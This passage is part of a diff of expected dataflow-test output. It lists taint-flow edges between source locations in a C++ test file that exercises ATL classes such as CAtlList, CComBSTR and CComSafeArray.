atl.cpp:359:25:359:27 | call to CAtlList | atl.cpp:361:10:361:14 | list3 | | +| atl.cpp:359:25:359:27 | call to CAtlList | atl.cpp:364:24:364:28 | list3 | | +| atl.cpp:359:25:359:27 | call to CAtlList | atl.cpp:398:3:398:3 | list3 | | +| atl.cpp:360:5:360:9 | ref arg list3 | atl.cpp:361:10:361:14 | list3 | | +| atl.cpp:360:5:360:9 | ref arg list3 | atl.cpp:364:24:364:28 | list3 | | +| atl.cpp:360:5:360:9 | ref arg list3 | atl.cpp:398:3:398:3 | list3 | | +| atl.cpp:361:10:361:14 | ref arg list3 | atl.cpp:364:24:364:28 | list3 | | +| atl.cpp:361:10:361:14 | ref arg list3 | atl.cpp:398:3:398:3 | list3 | | +| atl.cpp:363:25:363:26 | 10 | atl.cpp:363:25:363:27 | call to CAtlList | TAINT | +| atl.cpp:363:25:363:27 | call to CAtlList | atl.cpp:364:5:364:9 | list4 | | +| atl.cpp:363:25:363:27 | call to CAtlList | atl.cpp:365:10:365:14 | list4 | | +| atl.cpp:363:25:363:27 | call to CAtlList | atl.cpp:398:3:398:3 | list4 | | +| atl.cpp:364:5:364:9 | ref arg list4 | atl.cpp:365:10:365:14 | list4 | | +| atl.cpp:364:5:364:9 | ref arg list4 | atl.cpp:398:3:398:3 | list4 | | +| atl.cpp:364:24:364:28 | list3 | atl.cpp:364:23:364:28 | & ... | | +| atl.cpp:365:10:365:14 | ref arg list4 | atl.cpp:398:3:398:3 | list4 | | +| atl.cpp:368:27:368:28 | 10 | atl.cpp:368:27:368:29 | call to CAtlList | TAINT | +| atl.cpp:368:27:368:29 | call to CAtlList | atl.cpp:369:18:369:22 | list5 | | +| atl.cpp:368:27:368:29 | call to CAtlList | atl.cpp:369:32:369:36 | list5 | | +| atl.cpp:368:27:368:29 | call to CAtlList | atl.cpp:370:12:370:16 | list5 | | +| atl.cpp:368:27:368:29 | call to CAtlList | atl.cpp:371:5:371:5 | list5 | | +| atl.cpp:369:18:369:22 | ref arg list5 | atl.cpp:370:12:370:16 | list5 | | +| atl.cpp:369:18:369:22 | ref arg list5 | atl.cpp:371:5:371:5 | list5 | | +| atl.cpp:369:24:369:27 | call to Find | atl.cpp:370:24:370:26 | pos | | +| atl.cpp:369:32:369:36 | ref arg list5 | atl.cpp:369:18:369:22 | list5 | | +| atl.cpp:369:32:369:36 | ref arg list5 | atl.cpp:370:12:370:16 | list5 | | +| atl.cpp:369:32:369:36 | ref arg list5 | atl.cpp:371:5:371:5 | list5 | | +| atl.cpp:370:12:370:16 | ref arg list5 | atl.cpp:371:5:371:5 | list5 | | +| atl.cpp:374:27:374:28 | 10 | atl.cpp:374:27:374:29 | call to CAtlList | TAINT | +| atl.cpp:374:27:374:29 | call to CAtlList | atl.cpp:375:7:375:11 | list6 | | +| atl.cpp:374:27:374:29 | call to CAtlList | atl.cpp:376:18:376:22 | list6 | | +| atl.cpp:374:27:374:29 | call to CAtlList | atl.cpp:377:12:377:16 | list6 | | +| atl.cpp:374:27:374:29 | call to CAtlList | atl.cpp:378:5:378:5 | list6 | | +| atl.cpp:375:7:375:11 | ref arg list6 | atl.cpp:376:18:376:22 | list6 | | +| atl.cpp:375:7:375:11 | ref arg list6 | atl.cpp:377:12:377:16 | list6 | | +| atl.cpp:375:7:375:11 | ref arg list6 | atl.cpp:378:5:378:5 | list6 | | +| atl.cpp:376:18:376:22 | ref arg list6 | atl.cpp:377:12:377:16 | list6 | | +| atl.cpp:376:18:376:22 | ref arg list6 | atl.cpp:378:5:378:5 | list6 | | +| atl.cpp:376:24:376:32 | call to FindIndex | atl.cpp:377:24:377:26 | pos | | +| atl.cpp:377:12:377:16 | ref arg list6 | atl.cpp:378:5:378:5 | list6 | | +| atl.cpp:381:27:381:28 | 10 | atl.cpp:381:27:381:29 | call to CAtlList | TAINT | +| atl.cpp:381:27:381:29 | call to CAtlList | atl.cpp:382:18:382:22 | list7 | | +| atl.cpp:381:27:381:29 | call to CAtlList | atl.cpp:383:7:383:11 | list7 | | +| atl.cpp:381:27:381:29 | call to CAtlList | atl.cpp:384:12:384:16 | list7 | | +| atl.cpp:381:27:381:29 | call to CAtlList | atl.cpp:385:5:385:5 | list7 | | +| atl.cpp:382:18:382:22 | ref arg list7 | atl.cpp:383:7:383:11 | list7 | | +| atl.cpp:382:18:382:22 | ref arg list7 | atl.cpp:384:12:384:16 | list7 | | +| atl.cpp:382:18:382:22 | ref arg list7 | atl.cpp:385:5:385:5 | list7 | | +| atl.cpp:382:24:382:38 | call to GetTailPosition | atl.cpp:383:25:383:27 | pos | | +| atl.cpp:383:7:383:11 | ref arg list7 | atl.cpp:384:12:384:16 | list7 | | +| atl.cpp:383:7:383:11 | ref arg list7 | atl.cpp:385:5:385:5 | list7 | | +| atl.cpp:384:12:384:16 | ref arg list7 | atl.cpp:385:5:385:5 | list7 | | +| atl.cpp:388:27:388:28 | 10 | atl.cpp:388:27:388:29 | call to CAtlList | TAINT | +| atl.cpp:388:27:388:29 | call to CAtlList | atl.cpp:389:18:389:22 | list8 | | +| atl.cpp:388:27:388:29 | call to CAtlList | atl.cpp:390:7:390:11 | list8 | | +| atl.cpp:388:27:388:29 | call to CAtlList | atl.cpp:391:12:391:16 | list8 | | +| atl.cpp:388:27:388:29 | call to CAtlList | atl.cpp:392:5:392:5 | list8 | | +| atl.cpp:389:18:389:22 | ref arg list8 | atl.cpp:390:7:390:11 | list8 | | +| atl.cpp:389:18:389:22 | ref arg list8 | atl.cpp:391:12:391:16 | list8 | | +| atl.cpp:389:18:389:22 | ref arg list8 | atl.cpp:392:5:392:5 | list8 | | +| atl.cpp:389:24:389:38 | call to GetTailPosition | atl.cpp:390:26:390:28 | pos | | +| atl.cpp:390:7:390:11 | ref arg list8 | atl.cpp:391:12:391:16 | list8 | | +| atl.cpp:390:7:390:11 | ref arg list8 | atl.cpp:392:5:392:5 | list8 | | +| atl.cpp:391:12:391:16 | ref arg list8 | atl.cpp:392:5:392:5 | list8 | | +| atl.cpp:394:27:394:28 | 10 | atl.cpp:394:27:394:29 | call to CAtlList | TAINT | +| atl.cpp:394:27:394:29 | call to CAtlList | atl.cpp:395:7:395:11 | list9 | | +| atl.cpp:394:27:394:29 | call to CAtlList | atl.cpp:395:19:395:23 | list9 | | +| atl.cpp:394:27:394:29 | call to CAtlList | atl.cpp:396:12:396:16 | list9 | | +| atl.cpp:394:27:394:29 | call to CAtlList | atl.cpp:397:5:397:5 | list9 | | +| atl.cpp:395:7:395:11 | ref arg list9 | atl.cpp:396:12:396:16 | list9 | | +| atl.cpp:395:7:395:11 | ref arg list9 | atl.cpp:397:5:397:5 | list9 | | +| atl.cpp:395:19:395:23 | ref arg list9 | atl.cpp:395:7:395:11 | list9 | | +| atl.cpp:395:19:395:23 | ref arg list9 | atl.cpp:396:12:396:16 | list9 | | +| atl.cpp:395:19:395:23 | ref arg list9 | atl.cpp:397:5:397:5 | list9 | | +| atl.cpp:396:12:396:16 | ref arg list9 | atl.cpp:397:5:397:5 | list9 | | +| atl.cpp:454:21:454:33 | new | atl.cpp:455:3:455:6 | safe | | +| atl.cpp:454:21:454:33 | new | atl.cpp:456:10:456:13 | safe | | +| atl.cpp:455:3:455:6 | safe [post update] | atl.cpp:456:10:456:13 | safe | | +| atl.cpp:455:3:455:40 | ... = ... | atl.cpp:455:9:455:14 | pvData [post update] | | +| atl.cpp:455:18:455:38 | call to indirect_source | atl.cpp:455:3:455:40 | ... = ... | | +| atl.cpp:460:13:460:33 | call to indirect_source | atl.cpp:462:16:462:16 | x | | +| atl.cpp:460:13:460:33 | call to indirect_source | atl.cpp:469:20:469:20 | x | | +| atl.cpp:460:13:460:33 | call to indirect_source | atl.cpp:473:16:473:16 | x | | +| atl.cpp:460:13:460:33 | call to indirect_source | atl.cpp:481:11:481:11 | x | | +| atl.cpp:460:13:460:33 | call to indirect_source | atl.cpp:495:20:495:20 | x | | +| atl.cpp:462:16:462:16 | x | atl.cpp:462:16:462:17 | call to CComBSTR | TAINT | +| atl.cpp:462:16:462:17 | call to CComBSTR | atl.cpp:463:10:463:10 | b | | +| atl.cpp:462:16:462:17 | call to CComBSTR | atl.cpp:465:17:465:17 | b | | +| atl.cpp:462:16:462:17 | call to CComBSTR | atl.cpp:467:3:467:3 | b | | +| atl.cpp:463:10:463:10 | b [post update] | atl.cpp:465:17:465:17 | b | | +| atl.cpp:463:10:463:10 | b [post update] | atl.cpp:467:3:467:3 | b | | +| atl.cpp:463:12:463:16 | ref arg m_str | atl.cpp:466:13:466:17 | m_str | | +| atl.cpp:465:17:465:17 | b | atl.cpp:465:17:465:18 | call to CComBSTR | | +| atl.cpp:465:17:465:18 | call to CComBSTR | atl.cpp:466:10:466:11 | b2 | | +| atl.cpp:465:17:465:18 | call to CComBSTR | atl.cpp:467:3:467:3 | b2 | | +| atl.cpp:466:10:466:11 | b2 [post update] | atl.cpp:467:3:467:3 | b2 | | +| atl.cpp:469:16:469:21 | call to CComBSTR | atl.cpp:470:10:470:10 | b | | +| atl.cpp:469:16:469:21 | call to CComBSTR | atl.cpp:471:3:471:3 | b | | +| atl.cpp:470:10:470:10 | b [post update] | atl.cpp:471:3:471:3 | b | | +| atl.cpp:473:16:473:16 | x | atl.cpp:473:16:473:17 | call to CComBSTR | TAINT | +| atl.cpp:473:16:473:17 | call to CComBSTR | atl.cpp:477:11:477:11 | b | | +| atl.cpp:473:16:473:17 | call to CComBSTR | atl.cpp:513:3:513:3 | b | | +| atl.cpp:475:14:475:15 | call to CComBSTR | atl.cpp:476:10:476:11 | b2 | | +| atl.cpp:475:14:475:15 | call to CComBSTR | atl.cpp:477:5:477:6 | b2 | | +| atl.cpp:475:14:475:15 | call to CComBSTR | atl.cpp:478:10:478:11 | b2 | | +| atl.cpp:475:14:475:15 | call to CComBSTR | atl.cpp:513:3:513:3 | b2 | | +| atl.cpp:476:10:476:11 | b2 [post update] | atl.cpp:477:5:477:6 | b2 | | +| atl.cpp:476:10:476:11 | b2 [post update] | atl.cpp:478:10:478:11 | b2 | | +| atl.cpp:476:10:476:11 | b2 [post update] | atl.cpp:513:3:513:3 | b2 | | +| atl.cpp:476:13:476:17 | ref arg m_str | atl.cpp:478:13:478:17 | m_str | | +| atl.cpp:477:5:477:6 | ref arg b2 | atl.cpp:478:10:478:11 | b2 | | +| atl.cpp:477:5:477:6 | ref arg b2 | atl.cpp:513:3:513:3 | b2 | | +| atl.cpp:478:10:478:11 | b2 [post update] | atl.cpp:513:3:513:3 | b2 | | +| atl.cpp:480:14:480:15 | call to CComBSTR | atl.cpp:481:5:481:6 | b3 | | +| atl.cpp:480:14:480:15 | call to CComBSTR | atl.cpp:482:10:482:11 | b3 | | +| atl.cpp:480:14:480:15 | call to CComBSTR | atl.cpp:483:28:483:29 | b3 | | +| atl.cpp:480:14:480:15 | call to CComBSTR | atl.cpp:484:13:484:14 | b3 | | +| atl.cpp:480:14:480:15 | call to CComBSTR | atl.cpp:513:3:513:3 | b3 | | +| atl.cpp:481:5:481:6 | ref arg b3 | atl.cpp:482:10:482:11 | b3 | | +| atl.cpp:481:5:481:6 | ref arg b3 | atl.cpp:483:28:483:29 | b3 | | +| atl.cpp:481:5:481:6 | ref arg b3 | atl.cpp:484:13:484:14 | b3 | | +| atl.cpp:481:5:481:6 | ref arg b3 | atl.cpp:513:3:513:3 | b3 | | +| atl.cpp:481:11:481:11 | x | atl.cpp:481:11:481:11 | call to CComBSTR | TAINT | +| atl.cpp:482:10:482:11 | b3 [post update] | atl.cpp:483:28:483:29 | b3 | | +| atl.cpp:482:10:482:11 | b3 [post update] | atl.cpp:484:13:484:14 | b3 | | +| atl.cpp:482:10:482:11 | b3 [post update] | atl.cpp:513:3:513:3 | b3 | | +| atl.cpp:483:28:483:29 | ref arg b3 | atl.cpp:484:13:484:14 | b3 | | +| atl.cpp:483:28:483:29 | ref arg b3 | atl.cpp:513:3:513:3 | b3 | | +| atl.cpp:484:11:484:14 | * ... | atl.cpp:484:10:484:14 | * ... | TAINT | +| atl.cpp:484:12:484:12 | call to operator& | atl.cpp:484:11:484:14 | * ... | TAINT | +| atl.cpp:484:13:484:14 | ref arg b3 | atl.cpp:513:3:513:3 | b3 | | +| atl.cpp:486:14:486:15 | call to CComBSTR | atl.cpp:487:5:487:6 | b4 | | +| atl.cpp:486:14:486:15 | call to CComBSTR | atl.cpp:488:10:488:11 | b4 | | +| atl.cpp:486:14:486:15 | call to CComBSTR | atl.cpp:491:19:491:20 | b4 | | +| atl.cpp:486:14:486:15 | call to CComBSTR | atl.cpp:513:3:513:3 | b4 | | +| atl.cpp:487:5:487:6 | ref arg b4 | atl.cpp:488:10:488:11 | b4 | | +| atl.cpp:487:5:487:6 | ref arg b4 | atl.cpp:491:19:491:20 | b4 | | +| atl.cpp:487:5:487:6 | ref arg b4 | atl.cpp:513:3:513:3 | b4 | | +| atl.cpp:488:10:488:11 | b4 [post update] | atl.cpp:491:19:491:20 | b4 | | +| atl.cpp:488:10:488:11 | b4 [post update] | atl.cpp:513:3:513:3 | b4 | | +| atl.cpp:488:13:488:17 | ref arg m_str | atl.cpp:491:22:491:26 | m_str | | +| atl.cpp:490:14:490:15 | call to CComBSTR | atl.cpp:491:5:491:6 | b5 | | +| atl.cpp:490:14:490:15 | call to CComBSTR | atl.cpp:492:10:492:11 | b5 | | +| atl.cpp:490:14:490:15 | call to CComBSTR | atl.cpp:513:3:513:3 | b5 | | +| atl.cpp:491:5:491:6 | ref arg b5 | atl.cpp:492:10:492:11 | b5 | | +| atl.cpp:491:5:491:6 | ref arg b5 | atl.cpp:513:3:513:3 | b5 | | +| atl.cpp:491:19:491:20 | b4 [post update] | atl.cpp:513:3:513:3 | b4 | | +| atl.cpp:492:10:492:11 | b5 [post update] | atl.cpp:513:3:513:3 | b5 | | +| atl.cpp:494:14:494:15 | call to CComBSTR | atl.cpp:495:5:495:6 | b6 | | +| atl.cpp:494:14:494:15 | call to CComBSTR | atl.cpp:496:10:496:11 | b6 | | +| atl.cpp:494:14:494:15 | call to CComBSTR | atl.cpp:513:3:513:3 | b6 | | +| atl.cpp:495:5:495:6 | ref arg b6 | atl.cpp:496:10:496:11 | b6 | | +| atl.cpp:495:5:495:6 | ref arg b6 | atl.cpp:513:3:513:3 | b6 | | +| atl.cpp:496:10:496:11 | b6 [post update] | atl.cpp:513:3:513:3 | b6 | | +| atl.cpp:498:14:498:15 | call to CComBSTR | atl.cpp:499:5:499:6 | b7 | | +| atl.cpp:498:14:498:15 | call to CComBSTR | atl.cpp:500:10:500:11 | b7 | | +| atl.cpp:498:14:498:15 | call to CComBSTR | atl.cpp:503:19:503:20 | b7 | | +| atl.cpp:498:14:498:15 | call to CComBSTR | atl.cpp:513:3:513:3 | b7 | | +| atl.cpp:499:5:499:6 | ref arg b7 | atl.cpp:500:10:500:11 | b7 | | +| atl.cpp:499:5:499:6 | ref arg b7 | atl.cpp:503:19:503:20 | b7 | | +| atl.cpp:499:5:499:6 | ref arg b7 | atl.cpp:513:3:513:3 | b7 | | +| atl.cpp:500:10:500:11 | b7 [post update] | atl.cpp:503:19:503:20 | b7 | | +| atl.cpp:500:10:500:11 | b7 [post update] | atl.cpp:513:3:513:3 | b7 | | +| atl.cpp:500:13:500:17 | ref arg m_str | atl.cpp:503:22:503:26 | m_str | | +| atl.cpp:502:14:502:15 | call to CComBSTR | atl.cpp:503:5:503:6 | b8 | | +| atl.cpp:502:14:502:15 | call to CComBSTR | atl.cpp:504:10:504:11 | b8 | | +| atl.cpp:502:14:502:15 | call to CComBSTR | atl.cpp:513:3:513:3 | b8 | | +| atl.cpp:503:5:503:6 | ref arg b8 | atl.cpp:504:10:504:11 | b8 | | +| atl.cpp:503:5:503:6 | ref arg b8 | atl.cpp:513:3:513:3 | b8 | | +| atl.cpp:503:19:503:20 | b7 [post update] | atl.cpp:513:3:513:3 | b7 | | +| atl.cpp:504:10:504:11 | b8 [post update] | atl.cpp:513:3:513:3 | b8 | | +| atl.cpp:506:14:506:15 | call to CComBSTR | atl.cpp:508:5:508:6 | b9 | | +| atl.cpp:506:14:506:15 | call to CComBSTR | atl.cpp:509:5:509:6 | b9 | | +| atl.cpp:506:14:506:15 | call to CComBSTR | atl.cpp:512:10:512:11 | b9 | | +| atl.cpp:506:14:506:15 | call to CComBSTR | atl.cpp:513:3:513:3 | b9 | | +| atl.cpp:507:15:507:18 | safe | atl.cpp:509:21:509:24 | safe | | +| atl.cpp:507:15:507:18 | safe | atl.cpp:510:10:510:13 | safe | | +| atl.cpp:508:5:508:6 | ref arg b9 | atl.cpp:509:5:509:6 | b9 | | +| atl.cpp:508:5:508:6 | ref arg b9 | atl.cpp:512:10:512:11 | b9 | | +| atl.cpp:508:5:508:6 | ref arg b9 | atl.cpp:513:3:513:3 | b9 | | +| atl.cpp:509:5:509:6 | ref arg b9 | atl.cpp:512:10:512:11 | b9 | | +| atl.cpp:509:5:509:6 | ref arg b9 | atl.cpp:513:3:513:3 | b9 | | +| atl.cpp:509:20:509:24 | ref arg & ... | atl.cpp:509:21:509:24 | safe [inner post update] | | +| atl.cpp:509:20:509:24 | ref arg & ... | atl.cpp:510:10:510:13 | safe | | +| atl.cpp:509:21:509:24 | safe | atl.cpp:509:20:509:24 | & ... | | +| atl.cpp:512:10:512:11 | ref arg b9 | atl.cpp:513:3:513:3 | b9 | | +| atl.cpp:515:16:515:39 | call to indirect_source | atl.cpp:517:16:517:16 | w | | +| atl.cpp:515:16:515:39 | call to indirect_source | atl.cpp:521:15:521:15 | w | | +| atl.cpp:515:16:515:39 | call to indirect_source | atl.cpp:525:20:525:20 | w | | +| atl.cpp:517:16:517:16 | ref arg w | atl.cpp:521:15:521:15 | w | | +| atl.cpp:517:16:517:16 | ref arg w | atl.cpp:525:20:525:20 | w | | +| atl.cpp:517:16:517:16 | w | atl.cpp:517:16:517:17 | call to CComBSTR | TAINT | +| atl.cpp:517:16:517:17 | call to CComBSTR | atl.cpp:518:10:518:10 | b | | +| atl.cpp:517:16:517:17 | call to CComBSTR | atl.cpp:523:3:523:3 | b | | +| atl.cpp:518:10:518:10 | b [post update] | atl.cpp:523:3:523:3 | b | | +| atl.cpp:520:14:520:15 | call to CComBSTR | atl.cpp:521:5:521:6 | b2 | | +| atl.cpp:520:14:520:15 | call to CComBSTR | atl.cpp:522:10:522:11 | b2 | | +| atl.cpp:520:14:520:15 | call to CComBSTR | atl.cpp:523:3:523:3 | b2 | | +| atl.cpp:521:5:521:6 | ref arg b2 | atl.cpp:522:10:522:11 | b2 | | +| atl.cpp:521:5:521:6 | ref arg b2 | atl.cpp:523:3:523:3 | b2 | | +| atl.cpp:521:15:521:15 | ref arg w | atl.cpp:525:20:525:20 | w | | +| atl.cpp:522:10:522:11 | b2 [post update] | atl.cpp:523:3:523:3 | b2 | | +| atl.cpp:525:16:525:21 | call to CComBSTR | atl.cpp:526:10:526:10 | b | | +| atl.cpp:525:16:525:21 | call to CComBSTR | atl.cpp:527:3:527:3 | b | | +| atl.cpp:526:10:526:10 | b [post update] | atl.cpp:527:3:527:3 | b | | +| atl.cpp:572:22:572:33 | call to getSafeArray | atl.cpp:573:8:573:11 | safe | | +| atl.cpp:572:22:572:33 | call to getSafeArray | atl.cpp:575:24:575:27 | safe | | +| atl.cpp:572:22:572:33 | call to getSafeArray | atl.cpp:586:11:586:14 | safe | | +| atl.cpp:573:8:573:11 | safe [post update] | atl.cpp:575:24:575:27 | safe | | +| atl.cpp:573:8:573:11 | safe [post update] | atl.cpp:586:11:586:14 | safe | | +| atl.cpp:575:24:575:27 | safe | atl.cpp:575:24:575:28 | call to CComSafeArray | TAINT | +| atl.cpp:575:24:575:28 | call to CComSafeArray | atl.cpp:576:8:576:8 | c | | +| atl.cpp:575:24:575:28 | call to CComSafeArray | atl.cpp:577:8:577:8 | c | | +| atl.cpp:575:24:575:28 | call to CComSafeArray | atl.cpp:578:8:578:8 | c | | +| atl.cpp:575:24:575:28 | call to CComSafeArray | atl.cpp:579:8:579:8 | c | | +| atl.cpp:575:24:575:28 | call to CComSafeArray | atl.cpp:580:3:580:3 | c | | | atl.cpp:576:8:576:8 | ref arg c | atl.cpp:577:8:577:8 | c | | | atl.cpp:576:8:576:8 | ref arg c | atl.cpp:578:8:578:8 | c | | -| atl.cpp:576:8:576:8 | ref arg c | atl.cpp:579:3:579:3 | c | | +| atl.cpp:576:8:576:8 | ref arg c | atl.cpp:579:8:579:8 | c | | +| atl.cpp:576:8:576:8 | ref arg c | atl.cpp:580:3:580:3 | c | | | atl.cpp:577:8:577:8 | ref arg c | atl.cpp:578:8:578:8 | c | | -| atl.cpp:577:8:577:8 | ref arg c | atl.cpp:579:3:579:3 | c | | -| atl.cpp:578:8:578:8 | c [post update] | atl.cpp:579:3:579:3 | c | | -| atl.cpp:581:24:581:24 | call to CComSafeArray | atl.cpp:582:10:582:10 | c | | -| atl.cpp:581:24:581:24 | call to CComSafeArray | atl.cpp:583:10:583:10 | c | | -| atl.cpp:581:24:581:24 | call to CComSafeArray | atl.cpp:584:10:584:10 | c | | -| atl.cpp:581:24:581:24 | call to CComSafeArray | atl.cpp:585:5:585:5 | c | | -| atl.cpp:581:24:581:24 | call to CComSafeArray | atl.cpp:586:10:586:10 | c | | -| atl.cpp:581:24:581:24 | call to CComSafeArray | atl.cpp:587:10:587:10 | c | | -| atl.cpp:581:24:581:24 | call to CComSafeArray | atl.cpp:588:10:588:10 | c | | -| atl.cpp:581:24:581:24 | call to CComSafeArray | atl.cpp:589:35:589:35 | c | | -| atl.cpp:581:24:581:24 | call to CComSafeArray | atl.cpp:590:3:590:3 | c | | -| atl.cpp:582:10:582:10 | ref arg c | atl.cpp:583:10:583:10 | c | | -| atl.cpp:582:10:582:10 | ref arg c | atl.cpp:584:10:584:10 | c | | -| atl.cpp:582:10:582:10 | ref arg c | atl.cpp:585:5:585:5 | c | | -| atl.cpp:582:10:582:10 | ref arg c | atl.cpp:586:10:586:10 | c | | -| atl.cpp:582:10:582:10 | ref arg c | atl.cpp:587:10:587:10 | c | | -| atl.cpp:582:10:582:10 | ref arg c | atl.cpp:588:10:588:10 | c | | -| atl.cpp:582:10:582:10 | ref arg c | atl.cpp:589:35:589:35 | c | | -| atl.cpp:582:10:582:10 | ref arg c | atl.cpp:590:3:590:3 | c | | +| atl.cpp:577:8:577:8 | ref arg c | atl.cpp:579:8:579:8 | c | | +| atl.cpp:577:8:577:8 | ref arg c | atl.cpp:580:3:580:3 | c | | +| atl.cpp:578:8:578:8 | ref arg c | atl.cpp:579:8:579:8 | c | | +| atl.cpp:578:8:578:8 | ref arg c | atl.cpp:580:3:580:3 | c | | +| atl.cpp:579:8:579:8 | c [post update] | atl.cpp:580:3:580:3 | c | | +| atl.cpp:582:24:582:24 | call to CComSafeArray | atl.cpp:583:10:583:10 | c | | +| atl.cpp:582:24:582:24 | call to CComSafeArray | atl.cpp:584:10:584:10 | c | | +| atl.cpp:582:24:582:24 | call to CComSafeArray | atl.cpp:585:10:585:10 | c | | +| atl.cpp:582:24:582:24 | call to CComSafeArray | atl.cpp:586:5:586:5 | c | | +| atl.cpp:582:24:582:24 | call to CComSafeArray | atl.cpp:587:10:587:10 | c | | +| atl.cpp:582:24:582:24 | call to CComSafeArray | atl.cpp:588:10:588:10 | c | | +| atl.cpp:582:24:582:24 | call to CComSafeArray | atl.cpp:589:10:589:10 | c | | +| atl.cpp:582:24:582:24 | call to CComSafeArray | atl.cpp:590:35:590:35 | c | | +| atl.cpp:582:24:582:24 | call to CComSafeArray | atl.cpp:591:3:591:3 | c | | | atl.cpp:583:10:583:10 | ref arg c | atl.cpp:584:10:584:10 | c | | -| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:585:5:585:5 | c | | -| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:586:10:586:10 | c | | +| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:585:10:585:10 | c | | +| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:586:5:586:5 | c | | | atl.cpp:583:10:583:10 | ref arg c | atl.cpp:587:10:587:10 | c | | | atl.cpp:583:10:583:10 | ref arg c | atl.cpp:588:10:588:10 | c | | -| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:589:35:589:35 | c | | -| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:590:3:590:3 | c | | -| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:585:5:585:5 | c | | -| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:586:10:586:10 | c | | +| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:589:10:589:10 | c | | +| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:590:35:590:35 | c | | +| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:591:3:591:3 | c | | +| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:585:10:585:10 | c | | +| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:586:5:586:5 | c | | | atl.cpp:584:10:584:10 | ref arg c | atl.cpp:587:10:587:10 | c | | | atl.cpp:584:10:584:10 | ref arg c | atl.cpp:588:10:588:10 | c | | -| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:589:35:589:35 | c | | -| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:590:3:590:3 | c | | -| atl.cpp:585:5:585:5 | ref arg c | atl.cpp:586:10:586:10 | c | | -| atl.cpp:585:5:585:5 | ref arg c | atl.cpp:587:10:587:10 | c | | -| atl.cpp:585:5:585:5 | ref arg c | atl.cpp:588:10:588:10 | c | | -| atl.cpp:585:5:585:5 | ref arg c | atl.cpp:589:35:589:35 | c | | -| atl.cpp:585:5:585:5 | ref arg c | atl.cpp:590:3:590:3 | c | | -| atl.cpp:586:10:586:10 | ref arg c | atl.cpp:587:10:587:10 | c | | -| atl.cpp:586:10:586:10 | ref arg c | atl.cpp:588:10:588:10 | c | | -| atl.cpp:586:10:586:10 | ref arg c | atl.cpp:589:35:589:35 | c | | -| atl.cpp:586:10:586:10 | ref arg c | atl.cpp:590:3:590:3 | c | | +| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:589:10:589:10 | c | | +| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:590:35:590:35 | c | | +| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:591:3:591:3 | c | | +| atl.cpp:585:10:585:10 | ref arg c | atl.cpp:586:5:586:5 | c | | +| atl.cpp:585:10:585:10 | ref arg c | atl.cpp:587:10:587:10 | c | | +| atl.cpp:585:10:585:10 | ref arg c | atl.cpp:588:10:588:10 | c | | +| atl.cpp:585:10:585:10 | ref arg c | atl.cpp:589:10:589:10 | c | | +| atl.cpp:585:10:585:10 | ref arg c | atl.cpp:590:35:590:35 | c | | +| atl.cpp:585:10:585:10 | ref arg c | atl.cpp:591:3:591:3 | c | | +| atl.cpp:586:5:586:5 | ref arg c | atl.cpp:587:10:587:10 | c | | +| atl.cpp:586:5:586:5 | ref arg c | atl.cpp:588:10:588:10 | c | | +| atl.cpp:586:5:586:5 | ref arg c | atl.cpp:589:10:589:10 | c | | +| atl.cpp:586:5:586:5 | ref arg c | atl.cpp:590:35:590:35 | c | | +| atl.cpp:586:5:586:5 | ref arg c | atl.cpp:591:3:591:3 | c | | | atl.cpp:587:10:587:10 | ref arg c | atl.cpp:588:10:588:10 | c | | -| atl.cpp:587:10:587:10 | ref arg c | atl.cpp:589:35:589:35 | c | | -| atl.cpp:587:10:587:10 | ref arg c | atl.cpp:590:3:590:3 | c | | -| atl.cpp:588:10:588:10 | ref arg c | atl.cpp:589:35:589:35 | c | | -| atl.cpp:588:10:588:10 | ref arg c | atl.cpp:590:3:590:3 | c | | -| atl.cpp:589:35:589:35 | ref arg c | atl.cpp:590:3:590:3 | c | | -| atl.cpp:592:24:592:24 | call to CComSafeArray | atl.cpp:593:5:593:5 | c | | -| atl.cpp:592:24:592:24 | call to CComSafeArray | atl.cpp:594:10:594:10 | c | | -| atl.cpp:592:24:592:24 | call to CComSafeArray | atl.cpp:595:10:595:10 | c | | -| atl.cpp:592:24:592:24 | call to CComSafeArray | atl.cpp:596:10:596:10 | c | | -| atl.cpp:592:24:592:24 | call to CComSafeArray | atl.cpp:597:3:597:3 | c | | -| atl.cpp:593:5:593:5 | ref arg c | atl.cpp:594:10:594:10 | c | | -| atl.cpp:593:5:593:5 | ref arg c | atl.cpp:595:10:595:10 | c | | -| atl.cpp:593:5:593:5 | ref arg c | atl.cpp:596:10:596:10 | c | | -| atl.cpp:593:5:593:5 | ref arg c | atl.cpp:597:3:597:3 | c | | -| atl.cpp:594:10:594:10 | ref arg c | atl.cpp:595:10:595:10 | c | | -| atl.cpp:594:10:594:10 | ref arg c | atl.cpp:596:10:596:10 | c | | -| atl.cpp:594:10:594:10 | ref arg c | atl.cpp:597:3:597:3 | c | | +| atl.cpp:587:10:587:10 | ref arg c | atl.cpp:589:10:589:10 | c | | +| atl.cpp:587:10:587:10 | ref arg c | atl.cpp:590:35:590:35 | c | | +| atl.cpp:587:10:587:10 | ref arg c | atl.cpp:591:3:591:3 | c | | +| atl.cpp:588:10:588:10 | ref arg c | atl.cpp:589:10:589:10 | c | | +| atl.cpp:588:10:588:10 | ref arg c | atl.cpp:590:35:590:35 | c | | +| atl.cpp:588:10:588:10 | ref arg c | atl.cpp:591:3:591:3 | c | | +| atl.cpp:589:10:589:10 | ref arg c | atl.cpp:590:35:590:35 | c | | +| atl.cpp:589:10:589:10 | ref arg c | atl.cpp:591:3:591:3 | c | | +| atl.cpp:590:35:590:35 | ref arg c | atl.cpp:591:3:591:3 | c | | +| atl.cpp:593:24:593:24 | call to CComSafeArray | atl.cpp:594:5:594:5 | c | | +| atl.cpp:593:24:593:24 | call to CComSafeArray | atl.cpp:595:10:595:10 | c | | +| 